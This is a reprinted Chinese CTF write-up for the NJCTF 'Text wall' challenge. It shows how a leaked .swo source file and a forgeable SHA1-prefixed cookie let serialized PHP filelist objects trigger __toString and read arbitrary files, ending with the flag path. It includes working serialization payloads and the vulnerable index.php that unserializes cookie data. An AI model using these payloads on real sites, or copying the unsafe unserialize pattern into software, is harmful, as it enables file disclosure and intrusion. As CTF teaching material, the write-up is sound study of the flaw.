内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

NJCTF Text wall writeup

2017-03-19 10:51 出处:清屏网 人气: 评论(0

NJCTF Text wall writeup php反序列化题

0x00 思路

输入 hiehiehie 点击submit之后,查看cookie,有一个list参数,其值为:

24c5889e00902d6bcc65073f0e91ea30bbe203c2a:1:{i:0;s:9:"hiehiehie";}

前面这串看这像md5,于是将 a:1:{i:0;s:9:"hiehiehie";} 加密,发现是sha1加密

按照套路,这就是一道反序列化题,构造反序列化一般都需要源码,所以找到了源码泄露点:

http://218.2.197.235:23721/.index.php.swo

长这个样子

<?php
$lists = [];
Classfilelist{
    public function__toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
........
?>

__toString()函数在echo一个对象时被调用

于是先自己构造一个filelist类的序列

Classfilelist{
	function__construct(){
 		$this->source = 'index.php';
 	}
	
    public function__toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
$file = new filelist();
var_dump(serialize($file));
?>

结果

string 'O:8:"filelist":1:{s:6:"source";s:9:"index.php";}' (length=48)

放到cookie提交

出来个这

把index.php打印出来了,可见它的echo点就在index.php这个地方,而不是我们传过去的整个序列化字符串

那么,可以在一个类中将变量设定为filelist类

$lists = [];
Classa{
	function__construct(){
 		$this->a = new filelist();
 	}
	
}
Classfilelist{
	function__construct(){
 		$this->source = 'index.php';
 	}//自己加了一个construct,给source赋值
	
    public function__toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
$file = new a();
var_dump(serialize($file));

类a是自己随便构造的,目的是想通过它echo变量a,而变量a又是filelist实例,这样,就能执行filelist的toString函数,就能将source变量指定文件的源码打印出来了

结果:

string 'O:1:"a":1:{s:1:"a";O:8:"filelist":1:{s:6:"source";s:9:"index.php";}}' (length=68)

提交:

9f57a6efb19d4e418d5c4284ef002eb4e5eec13aO:1:"a":1:{s:1:"a";O:8:"filelist":1:{s:6:"source";s:9:"index.php";}}

得到index.php的源码

看到了flag的地址,用相同方法可读取到flag。

index.php:

//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_COOKIE['lists'])){
    $cookie = $_COOKIE['lists'];
    $hash = substr($cookie, 0, 40);
    $sha1 = substr($cookie, 40);
    if(sha1($sha1) === $hash){
        $lists = unserialize($sha1);
    }
}
if(isset($_POST['hiehiehie'])){
    $info = $_POST['hiehiehie'];
    $lists[] = $info;
    $sha1 = serialize($lists);
    $hash = sha1($sha1);
    setcookie('lists', $hash.$sha1);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
  <title>Please Get Flag!!</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">  
  <script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
  <script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
    <div class="jumbotron">
        <h1>Please Get Flag!!</h1>
    </div>
    <div class="row">
        <?php foreach($lists as $info):?>
            <div class="col-sm-4">
              <h3><?=$info?></h3>
            </div>
        <?php endforeach;?>
    </div>
    <form method="post" href=".">
        <input name="hiehiehie" value="hiehiehie">
        <input type="submit" value="submit">
    </form>
</div>
</body>
<html>

分享给小伙伴们:
本文标签: NJCTF

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号